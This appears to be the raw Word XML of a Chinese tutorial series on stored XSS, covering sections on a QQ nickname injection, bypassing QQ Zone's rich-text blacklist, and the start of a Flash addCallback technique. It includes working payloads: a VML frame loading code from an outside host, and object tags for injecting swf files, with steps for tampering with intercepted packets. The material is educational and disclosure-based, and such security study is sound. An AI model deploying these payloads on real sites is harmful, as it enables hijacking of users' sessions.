        <w:t>某一天，某一群，与某一妹子有以下对话。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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57D140A6" wp14:editId="11AA023D">
            <wp:extent cx="5715000" cy="5143500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="104" name="图片 104" descr="1.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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.jpg">
                      <a:hlinkClick r:id="rId1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E6" w:rsidRPr="009C207F" w:rsidRDefault="005440EB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SEQ 图 \* ARABIC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97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3620E6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3.过了一会，就来了这么一条消息，原来是手机QQ录了发上来的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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224A125" wp14:editId="1246F11F">
            <wp:extent cx="5715000" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="103" name="图片 103" descr="2.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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.jpg">
                      <a:hlinkClick r:id="rId1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E6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98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这个时候，我们就会想，这个发上来的页面会不会有XSS呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003620E6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我们来看看页面的结构。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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469CDC39" wp14:editId="0AB945C3">
            <wp:extent cx="5715000" cy="2276475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="102" name="图片 102" descr="4.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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4.jpg">
                      <a:hlinkClick r:id="rId1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E6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99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6.很多新手在找XSS的时候，都是拿着&lt;script&gt;alert(1)&lt;/script&gt;或者其它到处测试，很盲目不是吗？</w:t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一定要记住本节最开头的话，存储型XSS，输出的位置不一定出现在输入的位置。</w:t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7.因而我们有时候需要逆向的思维，来寻找存储型XSS。大概思路如下：</w:t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先找到输出点，然后猜测此处输出是否会被过滤。</w:t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果觉得可能没过滤，我们再找到这个输出是在哪里输入的。</w:t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接着开始测试输入，看输出的效果。</w:t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如果没过滤，那么你就成功了，否则你可以放弃掉它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F7A62" w:rsidRPr="009C207F" w:rsidRDefault="006F7A62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8.</w:t>
      </w:r>
      <w:r w:rsidR="003620E6" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拿本例来说明以上过程，</w:t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猜测昵称这个</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>输出没</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>过滤。</w:t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找到输入点，这个输入点，就是修改QQ昵称。</w:t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开始测试</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F7A62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通过WEBQQ修改昵称如下：(方法见：WooYun:PKAV</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>腾讯专场</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-3.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>腾讯</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>QQ客户端某处功能页面存储型XSS</w:t>
      </w:r>
      <w:r w:rsidR="006F7A62" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003620E6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使用charleswebproxy拦截WEBQQ数据包，修改并提交。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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0B5EF29" wp14:editId="5EA4968A">
            <wp:extent cx="5715000" cy="1971675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="101" name="图片 101" descr="9.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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9.jpg">
                      <a:hlinkClick r:id="rId1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E6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00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620E6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提交成功后：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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6B301123" wp14:editId="2E0E4B53">
            <wp:extent cx="5715000" cy="1971675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="100" name="图片 100" descr="6.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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6.jpg">
                      <a:hlinkClick r:id="rId1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E6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01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620E6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9.</w:t>
      </w:r>
      <w:r w:rsidR="003620E6" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们拿小号进入一个群，发布一条手机QQ的语音。看输出效果，没过滤，成功了吧～～</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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756C804C" wp14:editId="5E82D8F2">
            <wp:extent cx="5715000" cy="1552575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="99" name="图片 99" descr="3.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId2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3.jpg">
                      <a:hlinkClick r:id="rId2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E6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02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620E6" w:rsidRPr="009C207F" w:rsidRDefault="003620E6" w:rsidP="009C207F">
      <w:pPr>
        <w:pStyle w:val="detail1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005440EB" w:rsidRPr="009C207F" w:rsidRDefault="003620E6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CC9A6FC" wp14:editId="3F18010A">
            <wp:extent cx="5715000" cy="5600700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="98" name="图片 98" descr="5.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId2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5.jpg">
                      <a:hlinkClick r:id="rId2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3C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0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246D14" w:rsidRPr="009C207F" w:rsidRDefault="00246D14" w:rsidP="00246D14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E4003C" w:rsidRPr="009C207F" w:rsidRDefault="00E4003C" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二十节</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>存储型</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>入门</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>套现绕过富文本</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>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E4003C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E4003C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简要描述：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很多应用含有富文本内容，这类应用最典型的特征是具有编辑器，例如：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>博客日志</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，邮箱等。这类应用往往允许使用一定的HTML代码。为了在用户体验和安全之间寻找平衡，各种厂商可能采用了不尽相同的办法。但是总体来说，有2类。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第1类我们称为白名单，即：只允许使用白名单内的合法HTML标签，例如IMG。其它均剔除。例如：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>百度贴吧回帖</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时候的代码过滤方式。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第2类我们称为黑名单，即：厂商会构建一个有危害的HTML标签、属性列表，然后通过分析用户提交的HTML代码，剔除其中有害的部分。如：QQ邮箱的发邮件时的过滤方式。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白名单要安全得多，而黑名单的方式则经常会被绕过。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绕过的技巧也有很多，我们可以从最没技术含量的开始说起!!本节将以QQ空间/QQ校友的日志功能为例来说明，什么是“套现绕过富文本”！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E4003C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注意：本节说的“套现”，不是与“钱”有关的；在这里的含义是：“套用现成的XSS代码”。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E4003C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.新手平时测试XSS时，经常会用到&lt;script&gt;alert(1)&lt;/script&gt;到处插入，看效果。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2.这种做法，在某些反射型XSS，或者你运气好的时候，确实能碰到。但是如果拿到QQ空间日志里去插入。嗯，后果一定会很悲壮，被过滤的毛都没有了。。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3.这是为什么呢？因为&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在腾讯的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>黑名单中，被过滤是理所当然的。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试想，如果我们找到一个</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不在腾讯黑名单</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中的XSS代码，岂不是就可以成功在日志里执行XSS了么？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有的人会问了。。哪里去找啊??方法有2种：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你足够牛，自己去发现。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已经有大牛为我们准备了很好的资料，去里面翻。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E4003C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6.我不够牛，所以我只能去大牛的资料里翻</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>咯</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="006F7A62" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里我翻的是@sogili维护的http://html5sec.org/，里面有很多哦</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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6ECC144" wp14:editId="13BEFF02">
            <wp:extent cx="5715000" cy="3162300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="109" name="图片 109" descr="100.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId2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00.jpg">
                      <a:hlinkClick r:id="rId2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3C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04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7.然后我就开始按照下面的流程慢慢测试。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E4003C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先进QQ空间，发表一个日志，然后编辑日志，同时抓包。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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2149B723" wp14:editId="2403712A">
            <wp:extent cx="5715000" cy="2733675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="108" name="图片 108" descr="99.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId20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99.jpg">
                      <a:hlinkClick r:id="rId20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3C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05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修改抓包内容</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后，这里修改的是日志内容。提交修改后的数据包！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E4003C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然后我们来看看日志里的源代码里，我们提交的XSS代码是否被过滤。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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33191B9F" wp14:editId="6545618D">
            <wp:extent cx="5715000" cy="2600325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="107" name="图片 107" descr="101.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId2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01.jpg">
                      <a:hlinkClick r:id="rId2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3C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06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8.这里我们就不说失败的了，直接说成功的部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E4003C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提交以下代码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F7A62" w:rsidRPr="009C207F" w:rsidTr="006F7A62">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F7A62" w:rsidRPr="009C207F" w:rsidRDefault="006F7A6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vmlframexmlns="urn:schemas-microsoft-com:vml"style="behavior:url(#default#vml);position:absolute;width:100%;height:100%"src="http://itsokla.duapp.com/shouzi.vml#xss"&gt;&lt;/vmlframe&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E4003C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然后看看源代码的输出：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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1BC404E" wp14:editId="1DFBC143">
            <wp:extent cx="5715000" cy="1352550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="106" name="图片 106" descr="102.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId2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02.jpg">
                      <a:hlinkClick r:id="rId2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3C" w:rsidRPr="009C207F" w:rsidRDefault="005440EB" w:rsidP="00A15A13">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:jc w:val="center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9C207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07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可以看到，这个XSS代码完全没过滤。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E4003C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9.我们可以看到XSS的效果。鼠标移到日志上，即会触发XSS代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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5E31E168" wp14:editId="3AA14A38">
            <wp:extent cx="5715000" cy="3686175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="105" name="图片 105" descr="110.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId2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110.jpg">
                      <a:hlinkClick r:id="rId2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3C" w:rsidRPr="009C207F" w:rsidRDefault="005440EB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 w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText>SEQ 图 \* ARABIC</w:instrText>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve">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108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0.很简单，对吧？但是有以下问题我们要注意！！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F7A62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使用代码前，先自己在本地试下，是否能执行！搞清楚你所使用的XSS代码的原理是什么！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E4003C" w:rsidRPr="009C207F" w:rsidRDefault="00E4003C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搞清楚XSS代码的适用范围：如：在什么浏览器的什么版本之下才能使用，是否需要用户交互等。注意平时对此类代码的搜集与整理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00246D14" w:rsidRPr="009C207F" w:rsidRDefault="00246D14" w:rsidP="00246D14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(连载中)责任编辑：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>x1aoh4i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E74D3A" w:rsidRPr="009C207F" w:rsidRDefault="00E74D3A" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二十一节</w:t>
      </w:r>
      <w:r w:rsidR="00872663" w:rsidRPr="009C207F">
        <w:t>存储</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>进阶</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>猜测规则，利用</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>FlashaddCallback</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>构造</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>XSS]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作者：心伤的瘦子</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4147" w:rsidRPr="009C207F" w:rsidRDefault="00CC4147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来自：PKAV技术</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>宅</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E74D3A" w:rsidRPr="009C207F" w:rsidRDefault="00CC4147" w:rsidP="009C207F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网址：http://www.pkav.net</w:t>
      </w:r>
    </w:p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lastRenderedPageBreak/>
        <w:t>简要描述：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F7A62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有些时候，我们拿现成的XSS代码都不行，都被过滤了，那么需要我们对过滤的规则进行一定的判断与猜测。然后针对性的使用一些技巧来适应或者绕过规则。</w:t>
      </w:r>
    </w:p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在本例中，我们以QQ空间/QQ校友的日志功能为例，通过猜测简单的过滤规则，然后使用含有addCallback的flash，来实现了存储型XSS的构造。</w:t>
      </w:r>
    </w:p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详细说明：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F7A62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1.</w:t>
      </w:r>
      <w:r w:rsidR="00E74D3A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>前提：本例需在IE9，IE10下进行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F7A62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2.</w:t>
      </w:r>
      <w:r w:rsidR="00E74D3A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们乌云上报告的一些已有案例，进行了再次测试。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F7A62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WooYun:PKAV</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>腾讯专场</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-6.（QQ空间+朋友网）日志功能存储型XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F7A62" w:rsidRPr="009C207F" w:rsidRDefault="008A099F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 w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00E74D3A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上例中，提到了QQ空间日志并未对object标签进行有效的过滤。</w:t>
      </w:r>
    </w:p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根据此例中的代码对过滤规则进行测试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F7A62" w:rsidRPr="009C207F" w:rsidTr="006F7A62">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F7A62" w:rsidRPr="009C207F" w:rsidRDefault="006F7A6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objectwidth="100%"height="100%"align="middle"classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"type="application/x-shockwave-flash"&gt;&lt;PARAMNAME="Movie"VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"&gt;&lt;PARAMNAME="Src"VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"&gt;&lt;PARAMNAME="AllowScriptAccess"VALUE="always"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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以上的代码，是可以正常提交，并且未过滤的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F7A62" w:rsidRPr="009C207F" w:rsidTr="006F7A62">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F7A62" w:rsidRPr="009C207F" w:rsidRDefault="006F7A6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objectwidth="100%"height="100%"align="middle"classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"type="application/x-shockwave-flash"&gt;&lt;PARAMNAME="Movie"VALUE="http://mysite.com/vphoto.swf"&gt;&lt;PARAMNAME="Src"VALUE="http://mysite.com/vphoto.swf"&gt;&lt;PARAMNAME="AllowScriptAccess"VALUE="always"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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而当swf的域名不是qzs.qq.com时候，代码将会被过滤为以下内容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F7A62" w:rsidRPr="009C207F" w:rsidTr="006F7A62">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F7A62" w:rsidRPr="009C207F" w:rsidRDefault="006F7A6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objectwidth="100%"height="100%"align="middle"classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"type="application/x-shockwave-flash"&gt;&lt;PARAMNAME="AllowScriptAccess"VALUE="always"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003E762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即地址被去掉了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E762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4.那么我们已知了这个过滤规则，就有2种绕过的方式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E762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找到一个qzs.qq.com域名下存在缺陷的FLASH，然后加以利用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E762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此方法，已经在@gainover的WooYun:PKAV</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>腾讯专场</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-6.（QQ空间+朋友网）日志功能存储型XSS有所介绍了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E762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利用Flash的addcallback缺陷来构造存储型XSS。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E762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5.首先说下flashaddcallback方法的基本原理。</w:t>
      </w:r>
    </w:p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根据flashsdk里的源代码，我们可以得到flashaddcallback的源代码中有以下代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F7A62" w:rsidRPr="009C207F" w:rsidTr="006F7A62">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F7A62" w:rsidRPr="009C207F" w:rsidRDefault="006F7A6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if((((activeX==true))&amp;&amp;(!((objectID==null))))){</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F7A62" w:rsidRPr="009C207F" w:rsidRDefault="006F7A6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ab/>
              <w:t>_evalJS((((("__flash__addCallback(document.getElementById(\""+objectID)+"\"),\"")+functionName)+"\");"));</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F7A62" w:rsidRPr="009C207F" w:rsidRDefault="006F7A6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};</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006F7A62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8A90E59" wp14:editId="68985B86">
            <wp:extent cx="5715000" cy="1409700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="114" name="图片 114" descr="108.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId2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08.jpg">
                      <a:hlinkClick r:id="rId2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3A" w:rsidRPr="009C207F" w:rsidRDefault="006F7A62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09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3E762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其中objectID为调用FLASH的HTML标签的ID。functionName则为被JS所调用的函数名称。</w:t>
      </w:r>
    </w:p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6.当我们有以下代码时：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F7A62" w:rsidRPr="009C207F" w:rsidTr="006F7A62">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F7A62" w:rsidRPr="009C207F" w:rsidRDefault="006F7A6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objectid="aaaa"width="100%"height="100%"align="middle"classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"type="application/x-shockwave-flash"&gt;&lt;PARAMNAME="Movie"VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"&gt;&lt;PARAMNAME="Src"VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"&gt;&lt;PARAMNAME="AllowScriptAccess"VALUE="always"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
